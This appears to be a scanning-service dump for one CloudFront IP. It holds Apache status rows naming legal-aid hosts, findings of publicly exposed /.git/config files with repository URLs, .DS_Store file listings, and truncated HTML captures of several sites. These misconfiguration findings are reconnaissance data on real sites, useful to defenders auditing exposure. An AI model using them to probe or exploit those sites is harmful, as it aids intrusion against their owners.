0.05106.30.0131.76 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 48-92124650/5/869W 0.14000.00.1342.70 70.132.1.80http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 49-92124660/0/1573W 0.15400.00.0042.86 70.132.1.139http/1.1intranet.alas.org:8080GET / HTTP/1.1 50-92124760/4/991W 0.02300.00.00105.11 70.132.1.80http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 51-92124770/0/1149W 0.26300.00.0056.57 70.132.1.81http/1.1elearning.alas.org:8080GET / HTTP/1.1 52-92124780/3/1041W 0.01200.00.0049.06 70.132.1.139http/1.1atlantalegalaid.o
The following URL (usually /.git/config) is publicly accessible and is leaking source code and repository configuration.
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb5df27734
[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [remote "origin"] url = https://git-codecommit.ap-south-1.amazonaws.com/v1/repos/godoora-ui-prod fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
The following URL (usually /.git/config) is publicly accessible and is leaking source code and repository configuration.
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb5df27734
[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true symlinks = false ignorecase = true [remote "origin"] url = https://git-codecommit.ap-south-1.amazonaws.com/v1/repos/godoora-ui-prod fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: medium
Fingerprint: 5f32cf5d6962f09c910c508a910c508ac6902a06f6113de143766c2620b91e3d
Found 55 files trough .DS_Store spidering: /assets /assets/fonts /assets/fonts/satoshi /assets/fonts/satoshi/OTF /assets/fonts/satoshi/Variable /assets/fonts/satoshi/WEB /assets/fonts/satoshi/WEB/css /assets/fonts/satoshi/WEB/fonts /assets/fonts/satoshi/WEB/README.md /assets/icons /assets/icons/add.svg /assets/icons/arrouwLeft.svg /assets/icons/arrowRight.svg /assets/icons/backRight.svg /assets/icons/ball.svg /assets/icons/ball.tsx /assets/icons/beGamble.svg /assets/icons/cassino.svg /assets/icons/certificate.svg /assets/icons/chevronIcon.svg /assets/icons/closeMenu.svg /assets/icons/config.svg /assets/icons/copy.svg /assets/icons/cpf.svg /assets/icons/deposit.svg /assets/icons/doc.svg /assets/icons/email.svg /assets/icons/error.svg /assets/icons/exit.svg /assets/icons/fire.svg /assets/icons/fullscreen.svg /assets/icons/game.svg /assets/icons/gt.svg /assets/icons/key.svg /assets/icons/logo.svg /assets/icons/menu.svg /assets/icons/menu.tsx /assets/icons/menuHamburguer.svg /assets/icons/money.svg /assets/icons/more18.svg /assets/icons/phone.svg /assets/icons/podio.svg /assets/icons/promotion.svg /assets/icons/remove.svg /assets/icons/resize.svg /assets/icons/saque.svg /assets/icons/screen.svg /assets/icons/search.svg /assets/icons/sound.svg /assets/icons/telefone.svg /assets/icons/tiger-icon.jpg /assets/icons/user.svg /assets/images /next.svg /vercel.svg
Severity: low
Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a06e009db0d1990b3b4a4dfaa8601ea696
Found 13 files trough .DS_Store spidering: /assets /assets/fonts /assets/fonts/satoshi /assets/fonts/satoshi/OTF /assets/fonts/satoshi/Variable /assets/fonts/satoshi/WEB /assets/fonts/satoshi/WEB/css /assets/fonts/satoshi/WEB/fonts /assets/fonts/satoshi/WEB/README.md /assets/icons /assets/images /next.svg /vercel.svg
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0ff409caf15162e0cfa751d807a751d807
Found 3 files trough .DS_Store spidering: /assets /next.svg /vercel.svg
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733fa0a2250199c377e4756717455ebde79c
Found 10 files trough .DS_Store spidering: /assets /assets/fonts /assets/fonts/satoshi /assets/fonts/satoshi/OTF /assets/fonts/satoshi/Variable /assets/fonts/satoshi/WEB /assets/icons /assets/images /next.svg /vercel.svg
The following URL (usually /.git/config) is publicly accessible and is leaking source code and repository configuration.
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522b011144f
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = http://git.2jsncsk2dxks.xyz/pzhan/pzhan-luodiye-guide.git fetch = +refs/heads/*:refs/remotes/origin/*
The following URL (usually /.git/config) is publicly accessible and is leaking source code and repository configuration.
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522b011144f
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = http://git.2jsncsk2dxks.xyz/pzhan/pzhan-luodiye-guide.git fetch = +refs/heads/*:refs/remotes/origin/*
The following URL (usually /.git/config) is publicly accessible and is leaking source code and repository configuration.
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522b011144f
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = http://git.2jsncsk2dxks.xyz/pzhan/pzhan-luodiye-guide.git fetch = +refs/heads/*:refs/remotes/origin/*
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d48be94b448be94b448be94b448be94b4
Found 1 files trough .DS_Store spidering: /www.mysticalcape_files
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b83fcc84b192c18e6c5152afcc2bf2e35
Found 14 files trough .DS_Store spidering: /android /android/plugins /android/plugins/cordova-plugin-badge /android/plugins/cordova-plugin-camera /android/plugins/cordova-plugin-customurlscheme /android/plugins/cordova-plugin-device /android/plugins/cordova-plugin-fcm-with-dependecy-updated /android/plugins/cordova-plugin-inappbrowser /android/plugins/cordova-plugin-local-notification /android/plugins/cordova-plugin-safariviewcontroller /android/plugins/cordova-plugin-statusbar /img /ios /uploads
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719f57da1694eb6179cf7dbcdc60df2ab25
Found 16 files trough .DS_Store spidering: /android /android/plugins /android/plugins/cordova-plugin-badge /android/plugins/cordova-plugin-camera /android/plugins/cordova-plugin-customurlscheme /android/plugins/cordova-plugin-device /android/plugins/cordova-plugin-fcm-with-dependecy-updated /android/plugins/cordova-plugin-inappbrowser /android/plugins/cordova-plugin-local-notification /android/plugins/cordova-plugin-safariviewcontroller /android/plugins/cordova-plugin-statusbar /img /img/fills /img/logos /ios /uploads
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e94a7e05599e2172c10a14c31dd89064b4
Found 5 files trough .DS_Store spidering: /css /img /index.html /js /webfonts
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-12 21:28
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Mon, 12 Jan 2026 21:29:00 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 7fd88bab22735486702d23ba4e028d86.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: UzBjy97km8dQFPZqcE3mn59rwuJDs5WM14SAU9rSdfzD_kiCLEdKMw==
Age: 2
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:80 · blockmann.de
2026-01-12 04:32
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 12 Jan 2026 04:32:43 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://blockmann.de/ X-Cache: Redirect from cloudfront Via: 1.1 7fd88bab22735486702d23ba4e028d86.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: qmJ2g3ayes4GK6wthQ2b33146IL95GDyhqneyVd494wcXJw_JpmViQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · blockmann.de
2026-01-12 04:32
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 84965
Connection: close
Date: Mon, 12 Jan 2026 04:32:43 GMT
Last-Modified: Mon, 22 Dec 2025 12:40:17 GMT
ETag: "48d52b86fed523f4572aff11ff17b0f4"
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 3296b04068551f925d5fafd1b785ff30.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: WfzGKhitoQjyd3znKO7ZrAF6_KgwP_a1WVtrQLWQU3W6O5f5yxP80g==
Page title: Wir machen Meta zu deinem Anfragekanal Nr. 1 | Blockmann
<!DOCTYPE html><!-- Last Published: Mon Dec 22 2025 12:38:56 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-page="692acc165bee8d5279ed4577" data-wf-site="692acc165bee8d5279ed458f" lang="de">
<head>
<meta charset="utf-8">
<title>Wir machen Meta zu deinem Anfragekanal Nr. 1 | Blockmann</title>
<link href="https://www.blockmann.de" rel="canonical">
<meta property="og:url" content="https://www.blockmann.de">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 und verschaffen dir 1a Kundenanfragen, indem wir die Meta‑Ads, Funnel & Kampagnen unserer Kunden übernehmen." name="description">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 | Blockmann" property="og:title">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 und verschaffen dir 1a Kundenanfragen, indem wir die Meta‑Ads, Funnel & Kampagnen unserer Kunden übernehmen." property="og:description">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 | Blockmann" property="twitter:title">
<meta content="Wir machen Meta zu deinem Anfragekanal Nr. 1 und verschaffen dir 1a Kundenanfragen, indem wir die Meta‑Ads, Funnel & Kampagnen unserer Kunden übernehmen." property="twitter:description">
<meta property="og:type" content="website">
<meta content="summary_large_image" name="twitter:card">
<meta content="width=device-width, initial-scale=1" name="viewport">
<link href="css/normalize-0d336a97.css" rel="stylesheet" type="text/css">
<link href="css/webflow-b2dfaf5c.css" rel="stylesheet" type="text/css">
<link href="css/dev-blockmann-59a11b489cd45c6905b063aa7.webflow-6a95b8dd.css" rel="stylesheet" type="text/css">
<script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
<link href="images/favicon.png" rel="shortcut icon" type="image/x-icon">
<link href="images/webclip.png" rel="apple-touch-icon"><!-- Finsweet Cookie Consent -->
<script async="" fs-cc-mode="opt-in" fs-cc-endpoint="https://cookie-consent-dunkel-consulting.kontakt-231.workers.dev/">"use strict";(()=>{var Xe=Object.defineProperty;var Ze=(o,e,t)=>e in o?Xe(o,e,{enumerable:!0,configurable:!0,writable:!0,value:t}):o[e]=t;var u=(o,e,t)=>(Ze(o,typeof e!="symbol"?e+"":e,t),t);var N=(o,e="flex")=>new Promise(t=>{o.style.opacity="0",o.style.display=e,function n(){let r=parseFloat(o.style.opacity);if(r>=1){t();return}let s=r+.1;o.style.opacity=s.toString(),requestAnimationFrame(n)}()}),U=o=>new Promise(e=>{o.style.opacity="1",function t(){let r=parseFloat(o.style.opacity)-.1;o.style.opacity=r.toString(),r<=0?(o.style.display="none",e()):requestAnimationFrame(t)}()});var x=class{static activateAlerts(){this.alertsActivated=!0}static alert(e,t){if(this.alertsActivated&&window.alert(e),t==="error")throw new Error(e)}};u(x,"alertsActivated",!1);var w=(o,e)=>!!o&&e.includes(o);var A=(o,e)=>(Array.isArray(e)||(e=[e]),e.map(n=>o.dispatchEvent(new Event(n,{bubbles:!0}))).every(n=>n));function pe(o,e,t,n=!0){let r=t?[t]:[];if(!o)return r;let s=o.split(",").reduce((i,a)=>{let c=a.trim();return(!n||c)&&i.push(c),i},[]);if(e){let i=s.filter(a=>w(a,e));return i.length?i:r}return s}var ue=o=>Object.entries(o);var j=o=>Object.keys(o);var Q=o=>{let{overflow:e}=getComputedStyle(o);return e==="auto"||e==="scroll"};var Ae=o=>!!(o.offsetWidth||o.offsetHeight||o.getClientRects().length);var y=(o,e,t=document)=>{let n=t.querySelector(o);if(n instanceof e)return n};var me=o=>o.replace(/\/+$/,"");var X=(o,e=!0)=>(e!==o.checked&&(o.checked=e,A(o,["click","input","change"])),o.type==="checkbox"?o.checked:o.value);var ke=o=>new Promise(e=>setTimeout(e,o));var Z=class{constructor({element:e,duration:t}){u(this,"element");u(this,"active",!1);u(this,"running",!1);u(this,"runningPromise");u(this,"duration");u(this,"isActive",()=>this.active);u(this,"isRunning",()=>this.running);u(this,"untilFinished",()=>this.runningPromise);var n,r;this.element=typeof e=="string"?y(e,HTMLElement)||x.aler
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-11 21:15
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Tue, 30 Dec 2025 12:40:30 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 68b2682a924ac399aa2724b5b439e75c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: K-lbGZDOLNAyJPa2lvpEkU4dHNxMe9zH9vG2ju1z5_9QbSkUQu_dRw==
Age: 1067706
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:80 · publiciscreators.com
2026-01-11 10:17
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Sun, 11 Jan 2026 10:17:50 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://publiciscreators.com/ X-Cache: Redirect from cloudfront Via: 1.1 b4904c5988fd0eaae341a12cc47f3766.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: yoWx1Run59gyc8Q2cPNwCKa3Ig1hyGz0OYvOBxtFrLfBqeFORiU_Ng== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · publiciscreators.com
2026-01-11 10:17
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105190
Connection: close
Last-Modified: Thu, 08 Jan 2026 14:15:34 GMT
Server: AmazonS3
Date: Sun, 11 Jan 2026 10:17:48 GMT
ETag: "fcc469c0d6288dc35b15528d4ccd4c90"
X-Cache: Hit from cloudfront
Via: 1.1 ab21b6436bc1d51d57b228ad39b1fa54.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: zEMfptgz78zODSA75o2e5o5X5N4ItlSX6rALFNAbgOMBPAgJdl_CHg==
Age: 3
<!doctype html>
<html lang="en" data-beasties-container>
<head>
<meta charset="utf-8">
<title id="site-title"></title>
<base href="/">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="shortcut icon" href="./assets/media/logos/favicon.svg">
<style>@font-face{font-family:'Poppins';font-style:normal;font-weight:300;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLDz8Z11lFc-K.woff2) format('woff2');unicode-range:U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;}@font-face{font-family:'Poppins';font-style:normal;font-weight:300;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLDz8Z1JlFc-K.woff2) format('woff2');unicode-range:U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}@font-face{font-family:'Poppins';font-style:normal;font-weight:300;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2) format('woff2');unicode-range:U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face{font-family:'Poppins';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiEyp8kv8JHgFVrJJbecmNE.woff2) format('woff2');unicode-range:U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;}@font-face{font-family:'Poppins';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiEyp8kv8JHgFVrJJnecmNE.woff2) format('woff2');unicode-range:U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}@font-face{font-family:'Poppins';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiEyp8kv8JHgFVrJJfecg.woff2) format('woff2');unicode-range:U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face{font-family:'Poppins';font-style:normal;font-weight:500;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLGT9Z11lFc-K.woff2) format('woff2');unicode-range:U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;}@font-face{font-family:'Poppins';font-style:normal;font-weight:500;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLGT9Z1JlFc-K.woff2) format('woff2');unicode-range:U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}@font-face{font-family:'Poppins';font-style:normal;font-weight:500;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2) format('woff2');unicode-range:U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face{font-family:'Poppins';font-style:normal;font-weight:600;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLEj6Z11lFc-K.woff2) format('woff2');unicode-range:U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;}@font-face{font-family:'Poppins';font-style:normal;font-weight:600;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2) format('woff2');unicode-range:U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}@font-face{font-family:'Poppins';font-style:normal;font-weight:600;src:
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-10 21:30
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Sat, 20 Dec 2025 23:13:52 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 79272ab9b399ee696b329d4f677dca48.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: Z_3L4Hn9fgU5ZHU_8KnyUdNyELqOQCwyzSAXnClxm46FXnDscjnItQ==
Age: 1808185
Page title: 1 Year Anniversary
